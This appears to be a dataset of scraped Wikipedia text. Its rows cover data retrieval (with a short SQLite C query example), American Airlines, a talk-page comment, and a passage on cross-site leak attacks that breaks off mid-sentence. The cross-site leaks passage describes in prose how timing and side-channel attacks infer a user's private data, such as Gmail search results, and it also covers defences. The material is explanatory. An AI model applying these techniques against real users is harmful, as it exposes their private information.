490 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_retrieval | Data retrieval means obtaining data from a database management system (DBMS), such as an object-oriented database management system (ODBMS). In this case, it is considered that the data is represented in a structured way and there is no ambiguity in the data. In order to retrieve the desired data, the user presents a set of criteria by means of a query. The database management system then selects the demanded data from the database. The retrieved data may be stored in a file, printed, or viewed on the screen. A query language, such as Structured Query Language (SQL), is used to prepare the queries. SQL is an American National Standards Institute (ANSI) standardized query language developed specifically to write database queries. Each database management system may have its own language, but most are relational. Reports and queries are the two primary forms of retrieved data from a database. There are some overlaps between them, but queries generally select a relatively small portion of the database, while reports show larger amounts of data. Queries also present the data in a standard format and usually display it on the monitor, whereas reports allow the output to be formatted however you like and are normally printed. Reports are designed using a report generator built into the database management system. (A minimal query example is sketched after this entry.) |
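As a concrete illustration of retrieving data from a DBMS with an SQL query, here is a minimal sketch using the SQLite C API. The database file example.db, the articles table, and its columns are invented for the example, and error handling is kept to the bare minimum.

#include <stdio.h>
#include <sqlite3.h>

/* Callback invoked by SQLite once per row of the result set. */
static int print_row(void *unused, int ncols, char **values, char **names)
{
    (void)unused;
    for (int i = 0; i < ncols; i++)
        printf("%s=%s%s", names[i], values[i] ? values[i] : "NULL",
               i + 1 < ncols ? ", " : "\n");
    return 0;  /* 0 tells SQLite to continue with the next row */
}

int main(void)
{
    sqlite3 *db;
    char *err = NULL;

    if (sqlite3_open("example.db", &db) != SQLITE_OK) {
        fprintf(stderr, "open failed: %s\n", sqlite3_errmsg(db));
        return 1;
    }

    /* The query expresses the retrieval criteria; the DBMS selects
     * the matching rows from the (hypothetical) articles table. */
    const char *sql =
        "SELECT title, author FROM articles WHERE year >= 2020;";

    if (sqlite3_exec(db, sql, print_row, NULL, &err) != SQLITE_OK) {
        fprintf(stderr, "query failed: %s\n", err);
        sqlite3_free(err);
    }

    sqlite3_close(db);
    return 0;
}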
491 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/American_Airlines | American Airlines is a major airline in the United States headquartered in Fort Worth, Texas, within the Dallas Fort Worth metroplex. It is the largest airline in the world when measured by scheduled passengers carried, revenue passenger mile. American, together with its regional partners and affiliates, operates an extensive international and domestic network with almost 6,800 flights per day to nearly 350 destinations in 48 countries. 8 American Airlines is a founding member of the Oneworld alliance. Regional service is operated by independent and subsidiary carriers under the brand name American Eagle. 9 American Airlines and American Eagle operate out of 10 hubs, with Dallas Fort Worth International Airport (DFW) being its largest. The airline handles more than 200 million passengers annually with an average of more than 500,000 passengers daily. As of 2023 update , the company employs 103,200 staff members. American Airlines was started in 1930 as a union of more than eighty small airlines. 10 The two organizations from which American Airlines originated were Robertson Aircraft Corporation and Colonial Air Transport. The former was first created in Missouri in 1921, with both being merged in 1929 into holding company The Aviation Corporation. This, in turn, was made in 1930 into an operating company and rebranded as American Airways. In 1934, when new laws and attrition of mail contracts forced many airlines to reorganize, the corporation redid its routes into a connected system and was renamed American Airlines. The airline fully developed its international business between 1970 and 2000. It purchased Trans World Airlines in 2001. 11 American had a direct role in the development of the Douglas DC 3, which resulted from a marathon telephone call from American Airlines CEO C. R. Smith to Douglas Aircraft Company founder Donald Wills Douglas Sr., when Smith persuaded a reluctant Douglas to design a sleeper aircraft based on the DC 2 to replace American's Curtiss Condor II biplanes. (The existing DC 2's cabin was 66 inches (1.7 m) wide, too narrow for side-by-side berths.) Douglas agreed to go ahead with development only after Smith informed him of American's intention to purchase 20 aircraft. The prototype DST (Douglas Sleeper Transport) first flew on December 17, 1935, the 32nd anniversary of the Wright Brothers' flight at Kitty Hawk, North Carolina. Its cabin was 92 in (2.3 m) wide, and a version with 21 seats instead of the 14 16 sleeping berths of the DST was given the designation DC 3. There was no prototype DC 3; the first DC 3 built followed seven DSTs off the production line and was delivered to American Airlines. 12 American Airlines inaugurated passenger service on June 26, 1936, with simultaneous flights from Newark, New Jersey, and Chicago, Illinois. 13 American also had a direct role in the development of the DC 10, which resulted from a specification from American Airlines to manufacturers in 1966 to offer a widebody aircraft that was smaller than the Boeing 747, but capable of flying similar long-range routes from airports with shorter runways. McDonnell Douglas responded with the DC 10 trijet shortly after the two companies' merger. 14 On February 19, 1968, the president of American Airlines, George A. Spater, and James S. McDonnell of McDonnell Douglas announced American's intention to acquire the DC 10. American Airlines ordered 25 DC 10s in its first order. 
15 16 The DC 10 made its first flight on August 29, 1970, 17 and received its type certificate from the FAA on July 29, 1971. 18 On August 5, 1971, the DC 10 entered commercial service with American Airlines on a round trip flight between Los Angeles and Chicago. 19 In 2011, due to a downturn in the airline industry, American Airlines' parent company, the AMR Corporation, filed for bankruptcy protection. In 2013, American Airlines merged with US Airways but kept the American Airlines name, as it was the better-recognized brand internationally; the combination of the two airlines resulted in the creation of the largest airline in the United States, and ultimately the world. 20 In December 2023, the company was added to the Dow Jones Sustainability World Index. 21 As of August 2024 update , American Airlines flies (or has flown) to the following destinations: American currently operates ten hubs. 75 American Airlines is a member of the Oneworld alliance and has codeshares with the following airlines: 90 In addition to the above codeshares, American Airlines has entered into three joint ventures. 94 American Airlines is a key member of the Oneworld Atlantic joint venture on flights across the north Atlantic with European carriers British Airways, Finnair, and Iberia. Aer Lingus, which shares ownership with British Airways and Iberia, has received regulatory approval to join this joint venture. 95 96 Itineraries including flights operated by Oneworld partner Alaska Airlines are sold as part of itineraries in this JV, but Alaska is not a part of the JV. 97 American Airlines has a joint venture with fellow Oneworld member Japan Airlines for flights across the Pacific. 98 Combined, the airlines offer 16 daily flights to 9 cities between Japan and the United States with connections possible on Japan Airlines beyond Japan, and on American Airlines throughout North America, Latin America, and the Caribbean. 98 American Airlines has received approval to add additional service between John F. Kennedy International Airport and Haneda Airport in Tokyo, making it the only US airline flying between New York City and Tokyo and the joint venture the leader in frequencies offered between New York City and Tokyo's primary airport. 99 100 101 In 2019, American Airlines received regulatory approval to enter into a joint business relationship with Qantas covering flights between Australia, New Zealand, and the United States. 102 103 As of June 2024 update , the American Airlines fleet consists of 970 mainline aircraft, making it the second-largest commercial airline fleet in the world. 104 105 106 American Airlines operates aircraft manufactured by Boeing and Airbus. Over 80% of American's aircraft are narrow-bodies from the Airbus A320 family and the Boeing 737 family. It is the largest A320 family aircraft operator in the world, as well as the largest operator of the A319 and A321 variants. 107 American's wide-body aircraft are all Boeing airliners; however, the majority of the airline's total fleet consists of Airbus aircraft. American Airlines is the world's largest operator of the 787 8, the smallest variant of the Boeing 787 Dreamliner. 108 Flagship First is American's international and transcontinental first class product. It is offered only on Boeing 777 300ERs and select Airbus A321s which American designates "A321T". The seats are fully lie-flat and offer direct aisle access with only one on each side of the aisle in each row. 
113 As with the airline's other premium cabins, Flagship First offers wider food and beverage options, larger seats, and lounge access at certain airports. 114 American offers domestic Flagship First service on transcontinental routes between New York JFK and Los Angeles, New York JFK and San Francisco, New York-JFK and Santa Ana, Boston and Los Angeles, and Miami and Los Angeles, as well as on the standard domestic route between New York-JFK and Boston. 115 The airline will debut new Flagship Suite premium seats and a revamped aircraft interior for its long-haul fleet with fresh deliveries of its Airbus A321XLR and Boeing 787 9 aircraft, beginning in 2024. 116 Flagship Business is American's international and transcontinental business class product. It is offered on all Boeing 777 200ERs, Boeing 777 300ERs, Boeing 787 8s, and Boeing 787 9s, as well as select Airbus A321s. All Flagship Business seats are fully lie-flat. 117 The amenities in Flagship Business include complimentary alcoholic non-alcoholic beverages, multi-course meals, and lounge access. First class is offered on all domestically configured aircraft. Seats range from 19 21 inches (48 53 cm) in width and have 37 42 inches (94 107 cm) of pitch. 117 Dining options include complementary alcoholic and non-alcoholic beverages on all flights as well as standard economy snack offerings, enhanced snack basket selections on flights over 500 miles (800 km), and meals on flights 900 miles (1,400 km) or longer. 118 Premium Economy is American's economy plus product. It is offered on all widebody aircraft. The cabin debuted on the airline's Boeing 787 9s in late 2016 119 and is also available on Boeing 777 200s and 300s, and Boeing 787 8s. Premium Economy seats are wider than seats in the main cabin (American's economy cabin) and provide more amenities: Premium Economy customers get two free checked bags, priority boarding, and enhanced food and drink service including free alcohol. This product made American Airlines the first U.S. carrier to offer a four-cabin aircraft. 117 Main Cabin Extra is American's enhanced economy product. It is available on all of the mainline fleet and American Eagle aircraft. 117 Main Cabin Extra seats include greater pitch than is available in main cabin, along with free alcoholic beverages and boarding one group ahead of main cabin. 120 American retained Main Cabin Extra when the new Premium Economy product entered service in late 2016. 119 Main Cabin (economy class) is American's economy product and is found on all mainline and regional aircraft in its fleet. Seats range from 17 18.5 inches (43 47 cm) in width and have 30 32 inches (76 81 cm) of pitch. American markets a number of rows within the main cabin immediately behind Main Cabin Extra as "Main Cabin Preferred", which require an extra charge to select for those without status. 117 American Airlines marketed increased legroom in economy class as "More Room Throughout Coach", also referred to as "MRTC", starting in February 2000. Two rows of economy class seats were removed on domestic narrowbody aircraft, resulting in more than half of all standard economy seats having a pitch of 34 inches (86 cm) or more. 121 Amid financial losses, this scheme was discontinued in 2004. 122 On many routes, American also offers Basic Economy, the airline's lowest main cabin fare. Basic Economy consists of a Main Cabin ticket with numerous restrictions including waiting until check-in for a seat assignment, no upgrades or refunds, and boarding in the last group. 
123 Originally Basic Economy passengers could only carry a personal item, but American later revised their Basic Economy policies to allow for a carry-on bag. 124 In May 2017, American announced it would be adding more seats to some of its Boeing 737 MAX 8 jets and reducing overall legroom in the basic economy class. The last three rows were to lose 2 inches (5.1 cm), going from the current 31 to 29 inches (79 to 74 cm). The remainder of the main cabin was to have 30 inches (76 cm) of legroom. This "Project Oasis" seating configuration has since been expanded to all 737 MAX 8s as well as standard Boeing 737 800 and non-transcontinental Airbus A321 jets. New Airbus A321neo jets have been delivered with the same configuration. This configuration has been considered unpopular with passengers, especially American's frequent flyers, as the new seats have less padding, less legroom, and no seatback entertainment. 125 126 AAdvantage is the frequent flyer program for American Airlines. It was launched on May 1, 1981, and it remains the largest frequent flyer program with over 115 million members as of 2021. 127 Miles accumulated in the program allow members to redeem tickets, upgrade service class, or obtain free or discounted car rentals, hotel stays, merchandise, or other products and services through partners. The most active members, based on the accumulation of Loyalty Points with American Airlines, are designated AAdvantage Gold, AAdvantage Platinum, AAdvantage Platinum Pro, and AAdvantage Executive Platinum elite members, with privileges such as separate check-in, priority upgrade, and standby processing, or free upgrades. AAdvantage status correspond with Oneworld status levels allowing elites to receive reciprocal benefits from American's Oneworld partner airlines. 128 better source needed AAdvantage co-branded credit cards are also available and offer other benefits. The cards are issued by CitiCards, a subsidiary of Citigroup, Barclaycard, and Bilt card in the United States, 129 by several banks including Butterfield Bank and Scotiabank in the Caribbean, 130 131 and by Banco Santander in Brazil. 132 AAdvantage allows one-way redemption, starting at 7,500 miles. 133 The Admirals Club was conceived by AA president C.R. Smith as a marketing promotion shortly after he was made an honorary Texas Ranger. Inspired by the Kentucky colonels and other honorary title designations, Smith decided to make particularly valued passengers "admirals" of the "Flagship fleet" (AA called its aircraft "Flagships" at the time). 134 better source needed The list of admirals included many celebrities, politicians, and other VIPs, as well as more "ordinary" customers who had been particularly loyal to the airline. citation needed There was no physical Admirals Club until shortly after the opening of LaGuardia Airport. During the airport's construction, New York Mayor Fiorello LaGuardia had an upper-level lounge set aside for press conferences and business meetings. At one such press conference, he noted that the entire terminal was being offered for lease to airline tenants; after a reporter asked whether the lounge would be leased as well, LaGuardia replied that it would, and a vice president of AA immediately offered to lease the premises. The airline then procured a liquor license and began operating the lounge as the "Admirals Club" in 1939. 135 The second Admirals Club opened at Washington National Airport. 
Because it was illegal to sell alcohol in Virginia at the time, the club contained refrigerators for the use of its members, so they could store their liquor at the airport. 136 For many years, membership in the Admirals Club (and most other airline lounges) was by the airline's invitation. After a passenger sued for discrimination, 137 the club switched to a paid membership program in 1974. 138 139 Though affiliated with the Admirals Club and staffed by many of the same employees, the Flagship Lounge is a separate lounge specifically designed for customers flying in first class and business class on international flights and transcontinental domestic flights. 140 The key trends for American Airlines are (as of the financial year ending 31 December): American Airlines, Inc., is publicly traded through its parent company, American Airlines Group Inc., under NASDAQ: AAL Nasdaq: AAL, with a market capitalization of about $12 billion as of 2019, and is included in the S P 500 index. 46 American Eagle is a network of six regional carriers that operate under a codeshare and service agreement with American, operating flights to destinations in the United States, Canada, the Caribbean, and Mexico. Three of these carriers are independent and three are subsidiaries of American Airlines Group: Envoy Air Inc., Piedmont Airlines, Inc., and PSA Airlines Inc. 46 American Airlines is headquartered across several buildings in Fort Worth, Texas that it calls the "Robert L. Crandall Campus" in honor of former president and CEO Robert Crandall. The 1,700,000 square-foot (160,000 m2) square-foot, five-building office complex called was designed by Pelli Clarke Pelli Architects. 150 The campus is located on 300 acres, adjacent to Dallas Fort Worth International Airport, American's fortress hub. 151 Before it was headquartered in Texas, American Airlines was headquartered at 633 Third Avenue in the Murray Hill area of Midtown Manhattan, New York City. 152 153 In 1979, American moved its headquarters to a site at Dallas Fort Worth International Airport, which affected up to 1,300 jobs. Mayor of New York City Ed Koch described the move as a "betrayal" of New York City. 154 American moved to two leased office buildings in Grand Prairie, Texas. 155 On January 17, 1983, the airline finished moving into a $150 million ($459,000,000 when adjusted for inflation), 550,000 square-foot (51,000 m2) facility in Fort Worth; $147 million (about $450,000,000 when adjusted for inflation) in Dallas Fort Worth International Airport bonds financed the headquarters. The airline began leasing the facility from the airport, which owns the facility. 155 Following the merger of US Airways and American Airlines, the new company consolidated its corporate headquarters in Fort Worth, abandoning the US Airways headquarters in Phoenix, AZ. As of 2015, American Airlines is the corporation with the largest presence in Fort Worth. 156 In 2015, American announced that it would build a new headquarters in Fort Worth. Groundbreaking began in the spring of 2016 and occupancy completed in September 2019. 157 The airline plans to house 5,000 new workers in the building. 156 It will be located on a 41 acre (17 ha) property adjacent to the airline's flight academy and conference and training center, west of Texas State Highway 360, 2 miles (3.2 km) 157 west from the current headquarters. The airline will lease a total of 300 acres (120 ha) from Dallas Fort Worth International Airport and this area will include the headquarters. 
156 Construction of the new headquarters began after the demolition of the Sabre facility, previously on the site. 157 The airline considered developing a new headquarters in Irving, Texas, on the old Texas Stadium site, before deciding to keep the headquarters in Fort Worth. 156 In 1931, Goodrich Murphy, an American employee, designed the AA logo as an entry in a logo contest. The eagle in the logo was copied from a Scottish hotel brochure. 158 The logo was redesigned by Massimo Vignelli in 1967. 159 160 Thirty years later, in 1997, American Airlines was able to make its logo Internet-compatible by buying the domain AA.com. AA is also American's two-letter IATA airline designator. 161 On January 17, 2013, American launched a new rebranding and marketing campaign with FutureBrand dubbed, "A New American". This included a new logo, which includes elements of the 1967 logo. 162 American Airlines faced difficulty obtaining copyright registration for their 2013 logo. On June 3, 2016, American Airlines sought to register it with the United States Copyright Office, 163 but in October of that year, the Copyright Office ruled that the logo was ineligible for copyright protection, as it did not pass the threshold of originality, and was thus in the public domain. 163 American requested that the Copyright Office reconsider, but on January 8, 2018, the Copyright Office affirmed its initial determination. 163 164 After American Airlines submitted additional materials, the Copyright Office reversed its decision on December 7, 2018, and ruled that the logo contained enough creativity to merit copyright protection. 165 American's early liveries varied widely, but a common livery was adopted in the 1930s, featuring an eagle painted on the fuselage. 166 The eagle became a symbol of the company and inspired the name of American Eagle Airlines. Propeller aircraft featured an international orange lightning bolt running down the length of the fuselage, which was replaced by a simpler orange stripe with the introduction of jets. 167 In the late 1960s, American commissioned designer Massimo Vignelli to develop a new livery. The original design called for a red, white, and blue stripe on the fuselage, and a simple "AA" logo, without an eagle, on the tail; instead, Vignelli created a highly stylized eagle, which remained the company's logo until January 16, 2013. 168 On January 17, 2013, American unveiled a new livery. 169 Before then, American had been the only major U.S. airline to leave most of its aircraft surfaces unpainted. This was because C. R. Smith would not say he liked painted aircraft and refused to use any liveries that involved painting the entire plane. Robert "Bob" Crandall later justified the distinctive natural metal finish by noting that less paint reduced the aircraft's weight, thus saving on fuel costs. 170 In January 2013, American launched a new rebranding and marketing campaign dubbed, "The New American". In addition to a new logo, American Airlines introduced a new livery for its fleet. The airline calls the new livery and branding "a clean and modern update". 171 The current design features an abstract American flag on the tail, along with a silver-painted fuselage, as a throw-back to the old livery. The new design was painted by Leading Edge Aviation Services in California. 
172 Doug Parker, the incoming CEO, indicated that the new livery could be short-lived, stating that the only reason this is an issue now is that they just did it right in the middle of the merger , which kind of makes it confusing, so that gives us an opportunity, actually, to decide if we are going to do something different because we have so many airplanes to paint". 173 The current logo and livery have had mixed criticism, with Design Shack editor Joshua Johnson writing that they "boldly and proudly communicate the concepts of American pride and freedom wrapped into a shape that instantly makes you think about an airplane", 174 and AskThePilot.com author Patrick Smith describing the logo as 'a linoleum knife poking through a shower curtain'. 175 Later in January 2013, Bloomberg asked the designer of the 1968 American Airlines logo (Massimo Vignelli) on his opinion over the rebranding. 176 In the end, American let their employees decide the new livery's fate. On an internal website for employees, American posted two options, one the new livery and one a modified version of the old livery. All of the American Airlines Group employees (including US Airways and other affiliates) were able to vote. 177 American ultimately decided to keep the new look. Parker announced that American would keep a US Airways and America West heritage aircraft in the fleet, with plans to add a heritage TWA aircraft and a heritage American plane with the old livery. 178 As of September 2019, American has heritage aircraft for Piedmont, PSA, America West, US Airways, Reno Air, TWA, and AirCal in their fleet. 179 They also have two AA branded heritage 737 800 aircraft, an AstroJet N905NN, 180 and the polished aluminum livery used from 1967 to 2013, N921NN. 181 American, both before and after the merger with US Airways, has consistently performed poorly in rankings. The Wall Street Journal's annual airline rankings have ranked American as the worst or second-worst U.S. carrier for ten of the past twelve years, and in the bottom three of U.S. Airlines for at least the past twelve years. The airline has persistently performed poorly in the areas of losing checked luggage and bumping passengers due to oversold flights. 182 The main representatives of key groups of employees are: In 1942, American Airlines established Sky Chefs, a wholly-owned subsidiary, as a catering company to serve their fleet. 190 In 1986, Sky Chefs was sold to Toronto-based Onex Capital Corporation for $170 million. 190 191 Sky Chefs became a subsidiary of Onex Food Services Inc. 192 citation needed Since 2001, it has been fully owned by the LSG Group. 193 194 In the late 1960s, American Airlines established the Flagship Hotels chain as a subsidiary of Sky Chefs. On July 21, 1972, American Airlines leased four hotels from the Loews Corporation, three of them branded as Americana Hotels, for a period of thirty years. American merged the hotels with their Flagship Hotels, and rebranded the entire chain as Americana Hotels. 195 In 1980, American Airlines sold Americana Hotels to Bass Brothers Enterprises of Fort Worth, Texas. 196 Between October 1993 to July 1998, American Airlines was repeatedly cited for using high-sulfur fuel in motor vehicles at 10 major airports around the country, a violation of the Clean Air Act. 197 Since 1981, as a means of creating revenue in a period of loss-making, American Airlines had offered a lifetime pass of unlimited travel, for the initial cost of $250,000. 
198 This entitled the pass holder to fly anywhere in the world. Twenty-eight were sold. However, after some time, the airline realized they were making losses on the tickets, with the ticketholders costing them up to $1 million each. Ticketholders were booking large numbers of flights with some ticketholders flying interstate for lunch or flying to London multiple times a month. AA raised the cost of the lifetime pass to $3 million, and then finally stopped offering it in 2003. AA then used litigation to cancel two of the lifetime offers, saying the passes "had been terminated due to fraudulent activity". 199 On October 24, 2017, the NAACP issued a travel advisory for American Airlines urging African Americans to "exercise caution" when traveling with the airline. The NAACP issued the advisory after four incidents. In one incident, a black woman was moved from first class to coach while her white traveling companion was allowed to remain in first class. In another incident, a black man was forced to give up his seats after being confronted by two unruly white passengers. 210 According to the NAACP, while they did receive complaints on other airlines, most of their complaints in the year before their advisory were on American Airlines. 211 In July 2018, the NAACP lifted their travel advisory saying that American has made improvements to mitigate discrimination and unsafe treatment of African Americans. 212 As of March 2019, American Airlines has had almost sixty aircraft hull losses, beginning with the crash of an Ford 5 AT-C Trimotor in August 1931. 213 214 Of the hull losses, most were propeller driven aircraft, including three Lockheed L 188 Electra aircraft (of which one, the crash in 1959 of Flight 320, resulted in fatalities). 214 The two accidents with the highest fatalities in both the airline's and U.S. aviation history were Flight 191 in 1979 and Flight 587 in 2001. 215 Out of the 17 hijackings of American Airlines flights, two aircraft were hijacked and destroyed in the September 11 attacks: Flight 11 crashed into the North Tower of the World Trade Center, and Flight 77 crashed into the Pentagon. 216 Flight 11, which is responsible for an estimated 1,700 deaths, is the deadliest air crash in the history of aviation. American Airlines reported total CO2e emissions (direct and indirect) for the twelve months ending December 31, 2020, at 20,092 Kt ( 21,347 51.5% y-o-y). 217 The company aims to achieve net zero carbon emissions by 2050. 218 In November 2023, American Airlines purchased the first carbon credit contract (for 10,000 metric tons of CO2 sequestered at $100 per ton) from Graphyte, a carbon removal startup company invested in by Breakthrough Energy that compresses sawdust, tree bark, rice hulls, plant stalks, and other agricultural waste into biomass bricks wrapped in a polymer barrier to prevent decomposition that are stored underground. 219 220 |
492 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Talk:Web_scraping | This article links to one or more target anchors that no longer exist. Quote from article: "A web scraper is an Application Programming Interface (API) to ..." But is this correct? Isn't a web scraper more than just an API? 194.39.218.10 (talk) 14:58, 6 February 2020 (UTC) |
493 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cross-site_leaks | Cross-site leaks, also known as XS-leaks, is an internet security term used to describe a class of attacks used to access a user's sensitive information on another website. Cross-site leaks allow an attacker to access a user's interactions with other websites. This can contain sensitive information. Web browsers normally stop other websites from seeing this information. This is enforced through a set of rules called the same-origin policy. Attackers can sometimes get around these rules, using a "cross-site leak". Attacks using a cross-site leak are often initiated by enticing users to visit the attacker's website. Upon visiting, the attacker uses malicious code on their website to interact with another website. This can be used by a attacker to learn about the user's previous actions on the other website. The information from this attack can uniquely identify the user to the attacker. These attacks have been documented since 2000. One of the first research papers on the topic was published by researchers at Purdue University. The paper described an attack where the web cache was exploited to gather information about a website. Since then, cross-site leaks have become increasingly sophisticated. Researchers have found newer leaks targeting various web browser components. While the efficacy of some of these techniques varies, newer techniques are continually being discovered. Some older methods are blocked through updates to browser software. The introduction and removal of features on the Internet also lead to some attacks being rendered ineffective. Cross-site leaks are a diverse form of attack, and there is no consistent classification of such attacks. Multiple sources classify cross-site leaks by the technique used to leak information. Among the well-known cross-site leaks are timing attacks, which depend on timing events within the web browser. Error events constitute another category, using the presence or absence of events to disclose data. Additionally, cache-timing attacks rely on the web cache to unveil information. Since 2023, newer attacks that use operating systems and web browser limits to leak information have also been found. Before 2017, defending against cross-site leaks was considered to be difficult. This was because many of the information leakage issues exploited by cross-site leak attacks were inherent to the way websites worked. Most defences against this class of attacks have been introduced after 2017 in the form of extensions to the hypertext transfer protocol (HTTP). These extensions allow websites to instruct the browser to disallow or annotate certain kinds of stateful requests coming from other websites. One of the most successful approaches browsers have implemented is SameSite cookies. SameSite cookies allow websites to set a directive that prevents other websites from accessing and sending sensitive cookies. Another defence involves using HTTP headers to restrict which websites can embed a particular site. Cache partitioning also serves as a defence against cross-site leaks, preventing other websites from using the web cache to exfiltrate data. Web applications (web apps) have two primary components: a web browser and one or more web servers. The browser typically interacts with the servers via hyper text transfer protocol (HTTP) and WebSocket connections to deliver a web app. 
note 1 To make the web app interactive, the browser also renders HTML and CSS, and executes JavaScript code provided by the web app. These elements allow the web app to react to user inputs and run client-side logic. 2 Often, users interact with the web app over long periods of time, making multiple requests to the server. To keep track of such requests, web apps often use a persistent identifier tied to a specific user through their current session or user account. 3 This identifier can include details like age or access level, which reflect the user's history with the web app. If revealed to other websites, these identifiable attributes might deanonymize the user. 4 Ideally, each web app should operate independently without interfering with others. However, due to various design choices made during the early years of the web, web apps can regularly interact with each other. 5 To prevent the abuse of this behavior, web browsers enforce a set of rules called the same-origin policy that limits direct interactions between web applications from different sources. 6 7 Despite these restrictions, web apps often need to load content from external sources, such as instructions for displaying elements on a page, design layouts, and videos or images. These types of interactions, called cross-origin requests, are exceptions to the same-origin policy. 8 They are governed by a set of strict rules known as the cross-origin resource sharing (CORS) framework. CORS ensures that such interactions occur under controlled conditions by preventing unauthorized access to data that a web app is not allowed to see. This is achieved by requiring explicit permission before other websites can access the contents of these requests. 9 Cross-site leaks allow attackers to circumvent the restrictions imposed by the same-origin policy and the CORS framework. They leverage information-leakage issues (side channels) that have historically been present in browsers. Using these side channels, an attacker can execute code that can infer details about data that the same origin policy would have shielded. 10 This data can then be used to reveal information about a user's previous interactions with a web app. 11 To carry out a cross-site leak attack, an attacker must first study how a website interacts with users. They need to identify a specific URL that produces different Hyper Text Transfer Protocol (HTTP) responses based on the user's past actions on the site. 12 13 For instance, if the attacker is trying to attack Gmail, they could try to find a search URL that returns an different HTTP response based on how many search results are found for a specific search term in a user's emails. 14 Once an attacker finds a specific URL, they can then host a website and phish or otherwise lure unsuspecting users to the website. Once the victim is on the attacker's website, the attacker can use various embedding techniques to initiate cross-origin HTTP requests to the URL identified by the attacker. 15 However, since the attacker is on a different website, the same-origin policy imposed by the web browser will prevent the attacker from directly reading any part of the response sent by the vulnerable website. note 2 16 To circumvent this security barrier, the attacker can use browser-leak methods, to distinguish subtle differences between different responses. 
Browser leak methods are JavaScript, CSS or HTML snippets that leverage long-standing information leakage issues (side channels) in the web browser to reveal specific characteristics about an HTTP response. 12 13 In the case of Gmail, the attacker could use JavaScript to time how long the browser took to parse the HTTP response returned by the search result. If the time taken to parse the response returned by the endpoint was low, the attacker could infer that there were no search results for their query. Alternatively, if the site took longer, the attacker could infer that multiple search results were returned. 14 The attacker can subsequently use the information gained through these information leakages to exfiltrate sensitive information, which can be used to track and deanonymize the victim. 15 In the case of Gmail, the attacker could make a request to the search endpoint with a query and subsequently measure the time the query took to figure out whether or not the user had any emails containing a specific query string. note 3 If a response takes very little time to be processed, the attacker can assume that no search results were returned. Conversely, if a response takes a large amount of time to be processed, the attacker can infer that a lot of search results were returned. By making multiple requests, an attacker could gain significant insight into the current state of the victim application, potentially revealing private information of a user and helping launch sophisticated spamming and phishing attacks. 17 Cross-site leaks have been known about since 2000; 18 research papers dating from that year from Purdue University describe a theoretical attack that uses the HTTP cache to compromise the privacy of a user's browsing habits. 19 In 2007, Andrew Bortz and Dan Boneh from Stanford University published a white paper detailing an attack that made use of timing information to determine the size of cross-site responses. 20 In 2015, researchers from Bar-Ilan University described a cross-site search attack that used similar leaking methods. The attack employed a technique in which the input was crafted to grow the size of the responses, leading to a proportional growth in the time taken to generate the responses, thus increasing the attack's accuracy. 21 Independent security researchers have published blog posts describing cross-site leak attacks against real-world applications. In 2009, Chris Evans described an attack against Yahoo Mail via which a malicious site could search a user's inbox for sensitive information. 22 In 2018, Luan Herrara found a cross-site leak vulnerability in Google's Monorail bug tracker, which is used by projects like Chromium, Angle, and Skia Graphics Engine. This exploit allowed Herrara to exfiltrate data about sensitive security issues by abusing the search endpoint of the bug tracker. 23 24 In 2019, Terjanq, a Polish security researcher, published a blog post describing a cross-site search attack that allowed them to exfiltrate sensitive user information across high-profile Google products. 25 26 As part of its increased focus on dealing with security issues that depend on misusing long-standing web-platform features, Google launched the XSLeaks Wiki in 2020. The initiative aimed to create an open-knowledge database about web-platform features that were being misused, and to analyse and compile information about cross-site leak attacks. 
22 27 28 Since 2020, there has been some interest among the academic security community in standardizing the classification of these attacks. In 2020, Sudhodanan et al. were among the first to systematically summarize previous work in cross-site leaks, and developed a tool called BASTA-COSI that could be used to detect leaky URLs. 28 29 In 2021, Knittel et al. proposed a new formal model to evaluate and characterize cross-site leaks, allowing the researchers to find new leaks affecting several browsers. 28 30 In 2022, Van Goethem et al. evaluated currently available defences against these attacks and extended the existing model to consider the state of browser components as part of the model. 28 13 In 2023, a paper published by Rautenstrauch et al. systematizing previous research into cross-site leaks was awarded the Distinguished Paper Award at the IEEE Symposium on Security and Privacy. 31 The threat model of a cross-site leak relies on the attacker being able to direct the victim to a malicious website that is at least partially under the attacker's control. The attacker can accomplish this by compromising a web page, by phishing the user to a web page and loading arbitrary code, or by using a malicious advertisement on an otherwise-safe web page. 32 33 Cross-site leak attacks require that the attacker identify at least one state-dependent URL in the victim app for use in the attack app. Depending on the victim app's state, this URL must provide at least two responses. A URL can be crafted, for example, by linking to content that is only accessible to the user if they are logged into the target website. Including this state-dependent URL in the malicious application will initiate a cross-origin request to the target app. 15 Because the request is a cross-origin request, the same-origin policy prevents the attacker from reading the contents of the response. Using a browser-leak method, however, the attacker can query specific identifiable characteristics of the response, such as the HTTP status code. This allows the attacker to distinguish between responses and gain insight into the victim app's state. 12 13 Although every method of initiating a cross-origin request to a URL in a web page can in principle be combined with every browser-leak method, this does not work in practice because dependencies exist between different inclusion methods and browser leaks. Some browser-leak methods require specific inclusion techniques to succeed. 34 For example, if the browser-leak method relies on checking CSS attributes such as the width and height of an element, the inclusion technique must use an HTML element with a width and height property, such as an image element, that changes when a cross-origin request returns an invalid or a differently sized image. 35 36 Cross-site leaks comprise a highly varied range of attacks 37 for which there is no established, uniform classification. 38 However, sources typically categorize these attacks by the leaking techniques used during an attack. 34 As of 2021, researchers have identified over 38 leak techniques that target components of the browser. 32 New techniques are typically discovered due to changes in web platform APIs, which are JavaScript interfaces that allow websites to query the browser for specific information.
39 Although the majority of these techniques involve directly detecting state changes in the victim web app, some attacks also exploit alterations in shared components within the browser to indirectly glean information about the victim web app. 34 Timing attacks rely on the ability to time specific events across multiple responses. 40 These were discovered by researchers at Stanford University in 2007, making them one of the oldest known types of cross-site leak attacks. 20 While initially used only to differentiate between the time it took for an HTTP request to resolve, 20 research performed after 2007 has demonstrated the use of this leak technique to detect other differences across web-app states. In 2017, Vila et al. showed timing attacks could infer cross-origin execution times across embedded contexts. This was made possible by a lack of site isolation features in contemporaneous browsers, which allowed an attacking website to slow down and amplify timing differences caused by differences in the amount of JavaScript being executed when events were sent to a victim web app. 41 42 In 2021, Knittel et al. showed that the Performance API note 4 could leak the presence or absence of redirects in responses. This was possible due to a bug in the Performance API that allowed the amount of time shown to the user to be negative when a redirect occurred. Google Chrome subsequently fixed this bug. 44 In 2023, Snyder et al. showed timing attacks could be used to perform pool-party attacks in which websites could block shared resources by exhausting their global quota. By making the victim web app execute JavaScript that used these shared resources and then timing how long these 